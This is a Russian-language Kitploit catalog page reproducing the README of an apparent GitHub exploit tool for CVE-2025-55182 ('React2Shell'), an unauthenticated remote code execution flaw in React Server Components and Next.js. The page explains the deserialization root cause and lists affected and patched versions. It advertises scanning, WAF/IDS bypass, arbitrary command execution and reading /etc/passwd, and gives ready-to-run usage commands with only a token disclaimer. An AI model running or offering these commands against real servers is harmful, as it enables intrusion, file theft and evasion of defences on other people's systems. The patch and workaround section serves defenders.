Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — Эксплойт RCE до аутентификации для CVE-2025-55182 (React2Shell), нацеленный на React Server Components. Включает сканирование, верификацию OAST, обход WAF, выполнение команд и чтение файлов. | Kitploit
Инструменты/GitHubGitHub/sentinelxofficial/cve-2025-55182
РазведкаАнализ уязвимостейЭксплуатацияОбход IDS/IPSЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
sentinelxofficial/cve-2025-55182

CVE-2025-55182

Эксплойт RCE до аутентификации для CVE-2025-55182 (React2Shell), нацеленный на React Server Components. Включает сканирование, верификацию OAST, обход WAF, выполнение команд и чтение файлов.

Репозиторий
142 месяцев назадЕщё не проверено

CVE-2025-55182 — React2Shell

Удалённое выполнение кода без аутентификации в React Server Components (RSC), Next.js и связанных фреймворках.

CVE CVSS Type Author


Обзор

CVE-2025-55182 (также известна как React2Shell) — это критическая уязвимость удалённого выполнения кода без аутентификации, затрагивающая экосистему React Server Components (RSC). Неаутентифицированный злоумышленник может полностью скомпрометировать уязвимый сервер с помощью одного специально сформированного HTTP POST-запроса.

Технический анализ

Корневая причина

React Server Components использует собственный формат передачи данных под названием React Flight для сериализации ссылок на функции и вызовов модулей. Уязвимость существует в механизме декодирования полезной нагрузки, который обрабатывает входящие POST-запросы к конечным точкам RSC.

Когда сервер получает полезную нагрузку React Flight, он десериализует содержимое без надлежащей проверки, доверяя управляемым злоумышленником полям $$typeof и разрешению ссылок на модули. Это позволяет злоумышленнику:

  1. Ссылаться на произвольные встроенные модули Node.js (например, child_process, fs, net)
  2. Цеплять вызовы функций через маркер типа $F (функция)
  3. Выполнять произвольный код в среде выполнения сервера Node.js

Затронутые версии

CVSS

root@kitploit:~

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical


Возможности

  • Scan – Обнаружение уязвимых конечных точек RSC и определение версий Next.js/React.
  • Verify (OAST) – Отправка внеполосных полезных нагрузок для подтверждения RCE через DNS/HTTP обратные вызовы.
  • Bypass – Комплексный обход WAF/IDS: мутации content-type, кодирование полезной нагрузки, подмена заголовков, варианты путей и полезные нагрузки для WAF.
  • Execute – Выполнение произвольных системных команд на цели (например, id, whoami).
  • Read – Чтение произвольных файлов с сервера (например, /etc/passwd, package.json).
  • JSON Output – Машиночитаемые результаты для интеграции.

Установка

root@kitploit:~
git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt

Использование

Базовое сканирование

root@kitploit:~
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json

Проверка RCE с OAST

root@kitploit:~
python3 poc.py -t https://target.com -m verify --oast your.oast.domain

Полное тестирование обхода

root@kitploit:~
python3 poc.py -t https://target.com -m bypass --verbose

Выполнение команд

root@kitploit:~
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20

Чтение файлов

root@kitploit:~
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"

Использование прокси (например, Burp Suite)

root@kitploit:~
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080

Структура файлов

root@kitploit:~
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
    ├── __init__.py
    ├── payloads.py
    ├── scanner.py
    ├── bypass.py
    └── rce.py

Меры по смягчению

Патч (рекомендуется)

root@kitploit:~
npm install [email protected]
npm install [email protected] [email protected]

Временные обходные решения

· Отключите Server Functions ("use server") · Правила WAF для блокировки Content-Type: text/x-component · Сегментация сети для конечных точек RSC


Ссылки

· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182


Отказ от ответственности: Только для авторизованного тестирования безопасности.

Автор: SentinelX · https://t.me/SentinelXsecurity

Скачать инструмент
ПакетУязвимыеИсправленные
react-server-dom-webpack19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-parcel19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-turbopack19.0.0 – 19.2.0≥ 19.2.1
next (13.x)13.3.0 – 13.5.x≥ 14.2.35
next (14.x)14.0.0 – 14.2.34≥ 14.2.35
next (15.x)15.0.0+ (см. патч)исправленные релизы